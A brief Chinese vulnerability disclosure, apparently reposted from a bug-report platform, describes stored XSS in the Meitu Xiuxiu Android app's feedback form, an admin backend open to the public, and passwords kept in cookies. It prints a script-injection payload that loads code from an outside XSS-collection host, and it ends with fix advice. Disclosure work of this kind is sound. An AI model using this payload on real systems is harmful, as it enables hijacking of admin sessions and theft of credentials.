美图秀秀Andriod版,在意见反馈的地址那里,填上跨站代码,即可跨~
图可能有错误,代码应该写在联系方式那里
'"><script src=http://xsser.me/pIQKKz></script>
亲爱的厂商,你把密码写在cookies里面干嘛~
http://data.meitu测试数据/ipadmin/ip_recommoned.php?type=andriodxx
后台对公网开放~
固定好COOKIES后,打开这个地址先会有一个输入框和一个确定,直接点确定就OK~
找到了自己的代码~
修复方案: 后台不对外开放
COOKIES里面的是密码么?
FIX XSS~
End....
查看更多关于美图秀秀Andriod客户端反馈意见XSS漏洞 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13247